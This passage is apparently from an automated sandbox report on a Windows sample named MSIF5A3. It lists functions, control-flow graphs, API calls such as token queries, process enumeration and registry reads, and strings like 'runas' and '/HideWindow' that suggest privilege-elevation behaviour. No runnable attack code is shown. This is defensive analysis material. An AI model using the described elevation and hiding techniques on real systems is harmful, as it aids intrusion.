                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Window$AddressExecuteForegroundHandleModuleProcProcessShellWindows$AllowBringCodeDirectoryEnumExitObjectSingleSleepWait
                                                                                                                                                                                                                              • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$<Sc$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                                                                                                              • API String ID: 185584925-2870076374
                                                                                                                                                                                                                              • Opcode ID: dec12801849a801d48b871b5fe706af9b6f4514b100ca2e96a133a510fbdb9bd
                                                                                                                                                                                                                              • Instruction ID: 4eeb78aa478478370a3507f639575ace4f8cad5b2af4a818f37d3fc27ebce939
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dec12801849a801d48b871b5fe706af9b6f4514b100ca2e96a133a510fbdb9bd
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79E1E571E00A4A9BCF18DFA9C844BAEBBB6FF54714F544169E845AB391E7309D01CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E6A50 Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 461COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 103 5e6a50-5e6a82 104 5e6a84-5e6aa2 call 602937 103->104 105 5e6aa3-5e6add GetCurrentProcess OpenProcessToken 103->105 109 5e6adf-5e6af2 105->109 110 5e6b09-5e6b1e call 5e5de0 105->110 111 5e6af4-5e6afb CloseHandle 109->111 112 5e6b02-5e6b04 109->112 117 5e6b2e-5e6b30 110->117 118 5e6b20-5e6b2c call 5e1770 110->118 111->112 114 5e6c24-5e6c2b call 5e57c0 112->114 123 5e6ddb-5e6e06 call 5e2310 114->123 124 5e6c31-5e6c35 114->124 121 5e6b3f-5e6ba5 call 5e5f40 call 5e24c0 117->121 122 5e6b32-5e6b3d call 5e1770 117->122 118->109 139 5e6bdb 121->139 140 5e6ba7-5e6ba9 121->140 122->109 135 5e6e0c-5e6e2b call 5e46f0 123->135 136 5e6f96-5e6fa0 call 5e11d0 123->136 124->123 129 5e6c3b-5e6c3d 124->129 129->123 134 5e6c43-5e6c59 call 5e2310 129->134 134->136 147 5e6c5f-5e6c7e call 5e46f0 134->147 156 5e6e2d-5e6e2f 135->156 157 5e6e59-5e6e6a call 5e2310 135->157 146 5e6bdd-5e6c14 call 5e2e60 * 2 call 5e1770 139->146 144 5e6baf-5e6bb8 140->144 145 5e6c88-5e6c8a 140->145 144->139 150 5e6bba-5e6bbc 144->150 145->146 146->114 180 5e6c16-5e6c1d FindCloseChangeNotification 146->180 171 5e6cad-5e6cc9 call 5e2310 147->171 172 5e6c80-5e6c82 147->172 153 5e6bbf 150->153 153->139 158 5e6bc1-5e6bc4 153->158 161 5e6e35-5e6e3a 156->161 162 5e6e31-5e6e33 156->162 157->136 173 5e6e70-5e6e8c call 5e46f0 157->173 158->145 163 5e6bca-5e6bd9 158->163 168 5e6e40-5e6e49 161->168 167 5e6e4f-5e6e54 call 5e4ac0 162->167 163->139 163->153 167->157 168->168 178 5e6e4b-5e6e4d 168->178 171->136 187 5e6ccf-5e6ceb call 5e46f0 171->187 175 5e6c8f-5e6c91 172->175 176 5e6c84-5e6c86 172->176 191 5e6e8e-5e6e90 173->191 192 5e6eb9-5e6ec6 call 5e2310 173->192 182 5e6c94-5e6c9d 175->182 181 5e6ca3-5e6ca8 call 5e4ac0 176->181 178->167 180->114 181->171 182->182 185 5e6c9f-5e6ca1 182->185 185->181 201 5e6ced-5e6cef 187->201 202 5e6d19-5e6d26 call 5e2310 187->202 194 5e6e96-5e6e9b 191->194 195 5e6e92-5e6e94 191->195 192->136 208 5e6ecc-5e6ee8 call 5e46f0 192->208 199 5e6ea0-5e6ea9 194->199 198 5e6eaf-5e6eb4 call 5e4ac0 195->198 198->192 199->199 206 5e6eab-5e6ead 199->206 203 5e6cf5-5e6cfa 201->203 204 5e6cf1-5e6cf3 201->204 202->136 215 5e6d2c-5e6d48 call 5e46f0 202->215 210 5e6d00-5e6d09 203->210 209 5e6d0f-5e6d14 call 5e4ac0 204->209 206->198 219 5e6eea-5e6eec 208->219 220 5e6f10-5e6f28 call 5e52f0 208->220 209->202 210->210 213 5e6d0b-5e6d0d 210->213 213->209 229 5e6d4a-5e6d4c 215->229 230 5e6d70-5e6da4 call 5e4ba0 215->230 222 5e6eee-5e6ef0 219->222 223 5e6ef2-5e6ef4 219->223 228 5e6f2d-5e6f47 220->228 226 5e6f06-5e6f0b call 5e4ac0 222->226 227 5e6ef7-5e6f00 223->227 226->220 227->227 232 5e6f02-5e6f04 227->232 234 5e6f49-5e6f4c 228->234 235 5e6f51-5e6f65 228->235 236 5e6d4e-5e6d50 229->236 237 5e6d52-5e6d54 229->237 246 5e6dae-5e6dc2 230->246 247 5e6da6-5e6da9 230->247 232->226 234->235 239 5e6f6f-5e6f76 235->239 240 5e6f67-5e6f6a 235->240 238 5e6d66-5e6d6b call 5e4ac0 236->238 241 5e6d57-5e6d60 237->241 238->230 245 5e6f79-5e6f84 239->245 240->239 241->241 243 5e6d62-5e6d64 241->243 243->238 248 5e6f8e 245->248 249 5e6f86-5e6f89 245->249 250 5e6dcc-5e6dd6 246->250 251 5e6dc4-5e6dc7 246->251 247->246 248->136 249->248 250->245 251->250
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 005E6AC8
                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 005E6AD5
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005E6AF5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CloseCurrentHandleOpenToken
                                                                                                                                                                                                                              • String ID: S-1-5-18
                                                                                                                                                                                                                              • API String ID: 4052875653-4289277601
                                                                                                                                                                                                                              • Opcode ID: c224b0dd041591f3c248d16149d6e4f8d6172cceaba1a158fdcbc48e8b748597
                                                                                                                                                                                                                              • Instruction ID: 578c351ef718d5a98da6743f4a2a64677dfb8e70b65e898fa74b7efbc0b507e3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c224b0dd041591f3c248d16149d6e4f8d6172cceaba1a158fdcbc48e8b748597
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1602F670900299CFDF08DFA5C9587AEBFB5FF55394F148658D882AB285EB309E05CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E57C0 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 252 5e57c0-5e57df GetCurrentProcess OpenProcessToken 253 5e57e7-5e5814 GetTokenInformation 252->253 254 5e57e1-5e57e6 252->254 255 5e581e-5e582e CloseHandle 253->255 256 5e5816-5e581b 253->256 256->255
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,?,FAB1B776,?,-00000010), ref: 005E57D0
                                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 005E57D7
                                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 005E580C
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 005E5822
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 215268677-0
                                                                                                                                                                                                                              • Opcode ID: 607a3fb53b126d4dae6e4247c8e1684670739419b44758ee27e29f51fd155830
                                                                                                                                                                                                                              • Instruction ID: 11775c88defd0ea5ffb392a35375ce6394568111cea35dc3f9a978dc8cdebc36
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 607a3fb53b126d4dae6e4247c8e1684670739419b44758ee27e29f51fd155830
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60F01DB4148301ABEB209F20EC49FAA7BE9FB44744F509829FD84D21A0E779951DDB63
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005ECDB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(FAB1B776,?,?,?,?,?,?,?,?,?,006256D5,000000FF), ref: 005ECDE8
                                                                                                                                                                                                                                • Part of subcall function 005E1F80: LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,005E4251,FAB1B776,00000000,?,00000000,?,?,?,00624400,000000FF,?), ref: 005E1F9D
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 005ECEB1
                                                                                                                                                                                                                                • Part of subcall function 005E6600: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 005E667E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                                                                                                                                                                              • String ID: Full command line:
                                                                                                                                                                                                                              • API String ID: 1878577176-831861440
                                                                                                                                                                                                                              • Opcode ID: 45aa2ebb2af017b193a82dd1cc7b77404410d0494d131d3f35ee8eab433195ff
                                                                                                                                                                                                                              • Instruction ID: 0d4fa1c2d822c442d4b71ba9562f630db5864de41c22f758c4976c70fa2f449f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45aa2ebb2af017b193a82dd1cc7b77404410d0494d131d3f35ee8eab433195ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 972105719102959BCB19FB61CC49BEE7FA6BF90780F144118F492A72D2EF349A09C7D1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E5E40 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 289 5e5e40-5e5ebc GetTokenInformation 290 5e5ebe-5e5ec7 GetLastError 289->290 291 5e5f20-5e5f33 289->291 290->291 292 5e5ec9-5e5ed7 290->292 293 5e5ede 292->293 294 5e5ed9-5e5edc 292->294 296 5e5f0e-5e5f1a GetTokenInformation 293->296 297 5e5ee0-5e5ee7 293->297 295 5e5f0b 294->295 295->296 296->291 298 5e5ee9-5e5ef5 call 5e60d0 297->298 299 5e5ef7-5e5f08 call 604080 297->299 298->296 299->295
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,005E5E18,FAB1B776,?), ref: 005E5EB4
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,005E5E18,FAB1B776,?), ref: 005E5EBE
                                                                                                                                                                                                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,005E5E18,FAB1B776,?), ref: 005E5F1A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InformationToken$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2567405617-0
                                                                                                                                                                                                                              • Opcode ID: a76b9c8b6aba87e4a4970da4f1ba473079a87cdb4675ab45d24b968c930f9883
                                                                                                                                                                                                                              • Instruction ID: 714e3af7ef91460e0e05b92da0a0349cdc3daf199d261778567e107725f15bc1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a76b9c8b6aba87e4a4970da4f1ba473079a87cdb4675ab45d24b968c930f9883
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B931BFB1A006159FD724CF59CC45BAFBBF9FB44714F10492DF455A7280EBB1A9048BA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 006170BB Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 304 6170bb-6170c6 305 6170d4-6170da 304->305 306 6170c8-6170d2 304->306 308 6170f3-617104 RtlAllocateHeap 305->308 309 6170dc-6170dd 305->309 306->305 307 617108-617113 call 607370 306->307 313 617115-617117 307->313 310 617106 308->310 311 6170df-6170e6 call 615245 308->311 309->308 310->313 311->307 317 6170e8-6170f1 call 61bf83 311->317 317->307 317->308
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,?,0061596A,00000001,00000364,?,00000006,000000FF,?,00606CE7,00000000,A8a,00000000), ref: 006170FC
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: 87361adc0d97837c10001ec94650228ac331c6de15e6984b819b0f2fe13d3ced
                                                                                                                                                                                                                              • Instruction ID: 3fbc9482c68d2bd27bfbc1ec70f1666dc22e3376342e7a04c43e81ba2bb4ca56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87361adc0d97837c10001ec94650228ac331c6de15e6984b819b0f2fe13d3ced
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AF0E93164C7207BDB725A229C02BDB777FAF51771B1D4015BC14DA290CA30EC8186E5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E1F80 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 360 5e1f80-5e1faf LocalAlloc
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LocalAlloc.KERNELBASE(00000040,00000000,?,?,vector too long,005E4251,FAB1B776,00000000,?,00000000,?,?,?,00624400,000000FF,?), ref: 005E1F9D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocLocal
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3494564517-0
                                                                                                                                                                                                                              • Opcode ID: e7cb54e09563fc266d22b5f7a6ce56f8786480999ce92650b436bbecfc354d4c
                                                                                                                                                                                                                              • Instruction ID: 9a71d9e4c46ceb434ed3edbdf8f41f53327112d29d64079ec636a7ffb5c0c162
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7cb54e09563fc266d22b5f7a6ce56f8786480999ce92650b436bbecfc354d4c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80D05BB23052125FD7444B2CD80BB57E699AF94750F05C53FB505D72D4DA70DC514750
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 005E4BA0 Relevance: 33.5, APIs: 22, Instructions: 502comCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 005E57C0: GetCurrentProcess.KERNEL32(00000008,?,FAB1B776,?,-00000010), ref: 005E57D0
                                                                                                                                                                                                                                • Part of subcall function 005E57C0: OpenProcessToken.ADVAPI32(00000000), ref: 005E57D7
                                                                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 005E4C15
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(006272B0,00000000,00000004,00635104,00000000,?), ref: 005E4C45
                                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 005E5187
                                                                                                                                                                                                                              • _com_issue_error.COMSUPP ref: 005E51B5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CreateCurrentInitializeInstanceOpenTokenUninitialize_com_issue_error
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 928366108-0
                                                                                                                                                                                                                              • Opcode ID: e9dd3e55eddff6bb1059f89996613235399757c8f5d41691414b272740932f4b
                                                                                                                                                                                                                              • Instruction ID: 88eb86578fe20164f4cb7c24c9caff2d53ca89ac9100a9f4ab7d24c4b137cbd4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9dd3e55eddff6bb1059f89996613235399757c8f5d41691414b272740932f4b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C022BE70E04388DFEB24CFA9C948BADBFB9BF45308F148198E485EB281D7759A45CB51
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005EC870 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 366registryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 005ECBB6
                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,0063E6D0,00000800), ref: 005ECBD3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: OpenQueryValue
                                                                                                                                                                                                                              • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                                                                                                              • API String ID: 4153817207-482544602
                                                                                                                                                                                                                              • Opcode ID: 51eea7875b92335516e90e8ba4b500734723d02e32542972f00914c97ac337fe
                                                                                                                                                                                                                              • Instruction ID: afab7d388d32d365fdb59ba1b556d950a27698ba122f06d9c962b88a8f7ed8da
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51eea7875b92335516e90e8ba4b500734723d02e32542972f00914c97ac337fe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01C11735A043968ACB3C9F16C80127A7FA2FF91740F685469E8DACB291E770DD83C790
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 005E3860 Relevance: 10.7, APIs: 7, Instructions: 227processCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005E38CB
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005E390B
                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(?,00000000), ref: 005E395F
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 005E397A
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 005E3A8E
                                                                                                                                                                                                                              • Process32NextW.KERNEL32(?,00000000), ref: 005E3AA2
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 005E3AF0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756922516.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756934012.0000000000640000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_5e0000_MSIF5A3.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 708755948-0
                                                                                                                                                                                                                              • Opcode ID: c4d288b85de1bb73f8796e8dd1c8ba662225dc3f1c94e6df3731cf463ad36a6b
                                                                                                                                                                                                                              • Instruction ID: c1d8f1db0981ccf441d59f10ee6b5a4d064d3f514d1a94297c11020252505834
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4d288b85de1bb73f8796e8dd1c8ba662225dc3f1c94e6df3731cf463ad36a6b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 30A11AB1901259DFDF14CFA5D988BDEBFF9BF48304F148159E845AB280D7B45A44CBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 0061F032 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000005.00000002.1756874528.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000005.00000002.1756859839.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
